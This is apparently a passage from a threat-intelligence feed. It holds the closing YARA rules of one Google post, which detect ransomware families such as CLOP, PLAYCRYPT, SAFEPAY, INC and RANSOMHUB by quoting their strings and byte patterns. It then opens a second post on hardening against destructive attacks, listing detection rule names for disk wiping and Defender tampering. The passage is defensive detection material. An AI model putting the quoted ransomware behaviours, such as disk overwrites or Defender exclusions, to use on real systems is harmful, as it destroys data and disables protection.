E5 7F 91 } $hex_asm_literal_f = { 16 24 45 D6 } $hex_asm_literal_g = { 56 22 93 EA } condition: all of them }</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">CLOP.LINUX</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_CLOP_3 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $str_jobmessage_a = "Successfully started daemon-name" $str_jobmessage_b = "Could not change working directory to /" $str_jobmessage_c = "Could not generate session ID for child process" $asm_code_fileordirectory = { 25 00 F0 00 00 3D 00 40 00 00 75 } $asm_functioncall_open64_readfile = { 80 01 00 00 C7 44 ( 2? | 6? | A? | E? ) ?? 02 00 00 00 } $asm_functioncall_open64_writebytes = { B4 01 00 00 C7 44 ( 2? | 6? | A? | E? ) ?? 42 00 00 00 } $asm_encryption_filebuffersize = { 00 E1 F5 05 76 ?? C7 45 ?? 00 E1 F5 05 } $asm_encryption_generatekey = { 1F 89 ( C? | D? | E? | F? ) C1 ( C? | D? | E? | F? ) 18 8D ( 0? | 1? ) ( 0? | 1? ) 25 FF 00 [0-2] 29 ( C? | D? | E? | F? ) 83 ( C? | D? | E? | F? ) 01 C9 } condition: uint32(0) == 0x464C457F and all of ($str_*) or (#asm_code_fileordirectory == 2 and #asm_functioncall_open64_writebytes == 2 and ($asm_encryption_generatekey and $asm_functioncall_open64_readfile and $asm_encryption_filebuffersize)) }</code></pre></div> <div class="block-paragraph_advanced"><h5>PLAYCRYPT</h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransomware_PLAYCRYPT_1 { meta: author = "Google Threat Intelligence Group (GTIG)" date_created = "2022-12-21" date_modified = "2022-12-21" rev = "1" strings: $c1 = { 8A CB 0F B6 D0 8B F2 8B FA D3 EE 8D 4B 01 D3 EF 83 E6 01 83 E7 01 } $c2 = { 8D 45 F0 C7 85 D0 FD FF FF 00 00 00 00 50 83 EC 08 } $c3 = { 8B 14 0A 8B 4C 32 20 03 D6 89 55 E0 03 CE } $c4 = { 8D 8D 80 ?? FF FF E8 C8 ?? FF FF 85 C0 75 61 83 BD [2] FF FF 05 76 58 } $c5 = { FF 76 ?? C6 45 EE 00 E8 [2] 00 00 8B F0 8B CF 33 C0 85 F6 0F 48 F0 E8 } $c6 = { FF D0 8B F8 83 FF 05 0F [2] 01 00 00 83 FF 06 0F [2] 01 00 00 8B 0E 3B 4E 04 0F [2] 01 00 00 83 FF 04 74 6D 83 FF 01 } $s1 = "OpaqueKeyBlob" wide $s2 = "AppPolicyGetProcessTerminationMethod" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize &gt; 100KB and filesize &lt; 200KB and ((2 of ($c*) and all of ($s*)) or (4 of ($c*))) }</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">PLAYCRYPT.LINUX</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_PLAYCRYPT_LINUX_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = "First step is done." $s2 = "/dev/urandom" $s3 = "esxcli storage filesystem list &gt; storage" $s4 = "hosts in exclusion:" $s5 = "encrypt: " $s6 = ".PLAY" fullword condition: uint32(0) == 0x464C457F and all of them }</code></pre></div> <div class="block-paragraph_advanced"><h5>SAFEPAY</h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe" rule G_Ransom_SAFEPAY_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $hex_asm_snippet = { 10 27 00 00 [0-4] 10 27 00 00 } condition: pe.imphash() == "ff67c703589f775db9aed5a03e4489b0" and ($hex_asm_snippet) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_SAFEPAY_2 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $code_string_decode = { 8A C2 32 C1 32 44 0D ?? 34 ?? 88 44 0D ?? 41 83 F9 04 [4-64] B? 4D 5A 00 00 } $code_hardware_aes_check = { 0F A2 8B F3 5B 89 07 89 77 ?? 89 4F ?? 89 57 [0-12] ( 00 00 00 02 | C1 ?? 19 ) } $code_encrypt_file = { 14 00 10 00 [2-24] 14 00 10 00 [2-32] 00 10 00 5? [0-8] FF ( 15 | D? ) } $enc_str1 = { C7 45 ?? 67 4B 3D 49 C7 45 ?? 2F 4F 2F 4D } $enc_str2 = { C7 45 ?? 10 3C 51 3E C7 45 ?? 5C 38 4F 3A C7 45 ?? 42 34 58 36 C7 45 ?? 43 30 58 32 66 C7 45 ?? 2D 2C } $enc_str3 = { C7 45 ?? A3 8F FF 8D C7 45 ?? EF 8B E4 89 C7 45 ?? E0 87 E0 85 C7 45 ?? E7 83 EC 81 C7 45 ?? FB 9F E8 9D C7 45 ?? FF 9B 98 99 } $enc_str4 = { C7 45 ?? 44 40 51 47 C7 45 ?? 51 49 10 10 C7 45 ?? 03 48 43 42 C6 45 ?? 29 } $enc_str5 = { C7 45 ?? 77 77 73 74 C7 45 ?? 75 6D 64 70 C7 45 ?? 23 68 63 62 C6 45 ?? 09 } condition: uint16(0) == 0x5a4d and (all of ($code*) or (any of ($code*) and any of ($enc*)) or (2 of ($enc*))) }</code></pre></div> <div class="block-paragraph_advanced"><h5>INC</h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = "[*] Count of arguments: %d" wide $s2 = "[-] Failed" wide $s3 = "[+] Start" wide $s4 = "INC-README" wide $s5 = "--debug" wide $s6 = "RECYCLE" wide condition: all of them and (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) }</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">INC (Lynx Branded)</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_2 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = "[+] Proccess %s with PID: %d was killed succesffully" wide $s2 = "[*] Sending note to printer:" wide $s3 = "[+] Recycling bin..." wide $s4 = "[*] Starting full encryption in 5s" wide $s5 = "[+] Successfully decoded readme!" wide $s6 = "[-] Failed" wide $lynx = "lynx" ascii wide nocase condition: $lynx and 4 of ($s*) and (uint16(0) == 0x5A4D) and filesize &lt; 300KB and filesize &gt; 50KB }</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">INC (Sinobi Branded)</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_INC_3 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = "[+] Proccess %s with PID: %d was killed succesffully" wide $s2 = "[*] Sending note to printer:" wide $s3 = "[+] Recycling bin..." wide $s4 = "[*] Starting full encryption in 5s" wide $s5 = "[+] Successfully decoded readme!" wide $s6 = "[-] Failed" wide $sin = "sinobi" ascii wide nocase condition: $sin and 4 of ($s*) and (uint16(0) == 0x5A4D) and filesize &lt; 400KB and filesize &gt; 50KB }</code></pre></div> <div class="block-paragraph_advanced"><h5>INC.LINUX</h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_2 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = "[*] Count of arguments: %d" $s2 = "[-] Failed" $s3 = "[+] Start" $s4 = "INC-README" $s5 = "--debug" $s6 = "vmsvc" condition: all of them and uint32(0) == 0x464c457f }</code></pre></div> <div class="block-paragraph_advanced"><h5>RANSOMHUB</h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_RANSOMHUB_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $str1 = "json:\"settings\"" $str2 = "json:\"extension\"" $str3 = "json:\"net_spread\"" $str4 = "json:\"local_disks\"" $str5 = "json:\"running_one\"" $str6 = "json:\"self_delete\"" $str7 = "json:\"white_files\"" $str8 = "json:\"white_hosts\"" $str9 = "json:\"credentials\"" $str10 = "json:\"kill_services\"" $str11 = "json:\"set_wallpaper\"" $str12 = "json:\"white_folders\"" $str13 = "json:\"note_file_name\"" $str14 = "json:\"note_full_text\"" $str15 = "json:\"kill_processes\"" $str16 = "json:\"network_shares\"" $str17 = "json:\"note_short_text\"" $str18 = "json:\"master_public_key\"" condition: 14 of them }</code></pre></div> <div class="block-paragraph_advanced"><h5>FURYSTORM</h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_FURYSTORM_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = "Whitelist VM id" $s2 = "gwfn6l3bk45o2zecvi7xtyqrpsudmahj" $s3 = "Dry-run" $s4 = "-paths" $s5 = "-vmsvc" $s6 = "Note: motd=%d login=%d clean=%d" $s7 = "Cryptor args" $s8 = "VMX found" $s9 = "Keys: %016l" $s10 = "vim-cmd" $s11 = "Dropping readme" $s12 = "Encryption params" condition: uint32(0) == 0x464c457f and filesize &gt; 50KB and filesize &lt; 700KB and 6 of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_FURYSTORM_2 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = "Failed decrypt file:" $s2 = "Decryptor args:" $s3 = "Private key loaded" $s4 = "Keys: %016l" $s5 = "Dry-run" $s6 = "Encryption params" $s7 = "Whitelist paths" $s8 = "Note: motd=%d" condition: uint32(0) == 0x464c457f and filesize &gt; 50KB and filesize &lt; 300KB and 6 of them }</code></pre></div> <div class="block-paragraph_advanced"><h5>FIREFLAME</h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Autopatt_Ransom_FIREFLAME_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $p00_0 = { 8B CE 8D 5F ?? 8A 01 8D 49 ?? 0F B6 C0 83 E8 ?? 8D 04 40 C1 E0 ?? 99 } $p00_1 = { 55 8B EC FF 75 ?? E8 [4] 59 8B 4D ?? 89 01 F7 D8 1B C0 } condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (($p00_0 in (0 .. 380000) and $p00_1 in (260000 .. 280000))) }</code></pre></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Acknowledgements</span></h3> <p><span style="vertical-align: baseline;">This analysis would not have been possible without the assistance of Dima Lenz, Chastine Altares, Ana Foreman, and the Advanced Practices, Mandiant Consulting, and FLARE teams. </span></p></div>Mon, 16 Mar 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape/Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks/<div class="block-paragraph_advanced"><p>Written by: Matthew McWhirt, Bhavesh Dhake, Emilio Oropeza, Gautam Krishnan, Stuart Carrera, Greg Blaum, Michael Rudden</p> <hr/></div> <div class="block-paragraph_advanced"><p><em>UPDATE (March 13): <span style="vertical-align: baseline;">Added guidance around abuse or misuse of endpoint / MDM platforms</span>.</em></p> <h3><span style="vertical-align: baseline;">Background</span></h3> <p><span style="vertical-align: baseline;">Threat actors leverage destructive malware to destroy data, eliminate evidence of malicious activity, or manipulate systems in a way that renders them inoperable. Destructive cyberattacks can be a powerful means to achieve strategic or tactical objectives; however, the risk of reprisal is likely to limit the frequency of use to very select incidents. Destructive cyberattacks can include destructive malware, wipers, or modified ransomware.</span></p> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">When conflict erupts, cyber attacks are an inexpensive and easily deployable weapon. It should come as no surprise that instability leads to increases in attacks. </span>This blog post provides proactive recommendations for organizations to prioritize for protecting against a destructive attack within an environment. The recommendations include practical and scalable methods that can help protect organizations from not only destructive attacks, but potential incidents where a threat actor is attempting to perform reconnaissance, escalate privileges, laterally move, maintain access, and achieve their mission. </span></p> <p><span style="vertical-align: baseline;">The detection opportunities outlined in this blog post are meant to act as supplementary monitoring to existing security tools. Organizations should leverage endpoint and network security tools as additional preventative and detective measures. These tools use a broad spectrum of detective capabilities, including signatures and heuristics, to detect malicious activity with a reasonable degree of fidelity. The custom detection opportunities referenced in this blog post are correlated to specific threat actor behavior and are meant to trigger anomalous activity that is identified by its divergence from normal patterns. Effective monitoring is dependent on a thorough understanding of an organization's unique environment and usage of pre-established baselines.</span></p> <h3><span style="vertical-align: baseline;">Organizational Resilience</span></h3> <p><span style="vertical-align: baseline;">While the core focus of this blog post is aligned to technical- and tactical-focused security controls, technical preparation and recovery are not the </span><span style="font-style: italic; vertical-align: baseline;">only</span><span style="vertical-align: baseline;"> strategies. Organizations that include crisis preparation and orchestration as key components of security governance can naturally adopt a "living" resilience posture. This includes:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Out-of-Band Incident Command and Communication</strong><span style="vertical-align: baseline;">: Establish a pre-validated, "out-of-band" communication platform that is completely decoupled from the corporate identity plane. This ensures that the key stakeholders and third-party support teams can coordinate and communicate securely, even if the primary communication platform is unavailable.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Defined Operational Contingency and Recovery Plans: </strong><span style="vertical-align: baseline;">Establish baseline operational requirements, including manual procedures for vital business functions to ensure continuity during restoration or rebuild efforts. Organizations must also develop prioritized application recovery sequences and map the essential dependencies needed to establish a secure foundation for recovery goals.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Pre-Establish Trusted Third-Party Vendor Relationships: </strong><span style="vertical-align: baseline;">Based on the range of technologies and platforms vital to business operations, develop predefined agreements with external partners to ensure access to specialists for legal / contractual requirements, incident response, remediation, recovery, and ransomware negotiations.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Practice and Refine the Recovery: </strong><span style="vertical-align: baseline;">Conduct exercises that validate the end-to-end restoration of mission-critical services using isolated, immutable backups and out-of-band communication channels, ensuring that recovery timelines (RTO) and data integrity (RPO) are tested, practiced, and current. </span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Google Security Operations</span></h3> <p><a href="https://cloud.google.com/security/products/security-operations"><span style="text-decoration: underline; vertical-align: baseline;">Google Security Operations</span></a><span style="vertical-align: baseline;"> (SecOps) customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats, Mandiant Frontline Threats, Mandiant Hunting Rules, CDIR SCC Enhanced Data Destruction Alerts rule packs. The activity discussed in the blog post is detected in Google SecOps under the rule names:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">BABYWIPER File Erasure</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Secure Evidence Destruction And Cleanup Commands</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">CMD Launching Application Self Delete</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Copy Binary From Downloads</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Rundll32 Execution Of Dll Function Name Containing Special Character</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Services Launching Cmd</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">System Process Execution Via Scheduled Task</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Dllhost Masquerading</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Backdoor Writing Dll To Disk For Injection</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Multiple Exclusions Added To Windows Defender In Single Command</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Path Exclusion Added to Windows Defender</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Registry Change to CurrentControlSet Services</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Powershell Set Content Value Of 0</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Overwrite Disk Using DD Utility</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Bcdedit Modifications Via Command</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Disabling Crash Dump For Drive Wiping</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious Wbadmin Commands</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Fsutil File Zero Out</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Recommendations Summary</span></h3> <p><span style="vertical-align: baseline;">Table 1 provides a high-level overview of guidance in this blog post.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Focus Area</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks#:~:text=1.%20External%2DFacing%20Assets"><span style="text-decoration: underline; vertical-align: baseline;">External-Facing Assets</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Protect against the risk of threat actors exploiting an externally facing vector or leveraging existing technology for unauthorized remote access.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks#:~:text=2.%20Critical%20Asset%20Protections"><span style="text-decoration: underline; vertical-align: baseline;">Critical Asset Protections</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Protect specific high-value infrastructure and prepare for recovery from a destructive attack.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks#:~:text=3.%20On%2DPremises%20Lateral%20Movement%20Protections"><span style="text-decoration: underline; vertical-align: baseline;">On-Premises Lateral Movement Protections</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Protect against a threat actor with initial access into an environment from moving laterally to further expand their scope of access and persistence.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks#:~:text=4.%20Credential%20Exposure%20and%20Account%20Protections"><span style="text-decoration: underline; vertical-align: baseline;">Credential Exposure and Account Protections</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Protect against the exposure of privileged credentials to facilitate privilege escalation.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks#:~:text=5.%20Preventing%20Destructive%20Actions%20in%20Kubernetes%20and%20CI%2FCD%20Pipelines"><span style="text-decoration: underline; vertical-align: baseline;">Preventing Destructive Actions in Kubernetes and CI/CD Pipelines</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Protect the integrity and availability of Kubernetes environments and CI/CD pipelines.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Table 1: </span><span style="vertical-align: baseline;">Overview of recommendations</span></span></div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">1. External-Facing Assets</span></h3> <h4><span style="vertical-align: baseline;">Identify, Enumerate, and Harden</span></h4> <p><span style="vertical-align: baseline;">To protect against a threat actor exploiting vulnerabilities or misconfigurations via an external-facing vector, organizations must determine the scope of applications and organization-managed services that are externally accessible. Externally accessible applications and services (including both on-premises and cloud) are often targeted by threat actors for initial access by exploiting known vulnerabilities, brute-forcing common or default credentials, or authenticating using valid credentials. </span></p> <p><span style="vertical-align: baseline;">To proactively identify and validate external-facing applications and services, consider:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Leveraging a </span><span style="vertical-align: baseline;">vulnerability scanning technology to identify assets and associated vulnerabilities. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Performing a focused vulnerability assessment or penetration test with the goal of identifying external-facing vectors that could be leveraged for authentication and access.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Verifying with technology vendors if the products leveraged by an organization for external-facing services require patches or updates to mitigate known vulnerabilities. </span></p> </li> </ul> <p><span style="vertical-align: baseline;">Any identified vulnerabilities should not only be patched and hardened, but the identified technology platforms should also be reviewed to ensure that evidence of suspicious activity or technology/device modifications have not already occurred.</span></p> <p><span style="vertical-align: baseline;">The following table provides an overview of capabilities to proactively review and identify external-facing assets and resources within common cloud-based infrastructures.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; 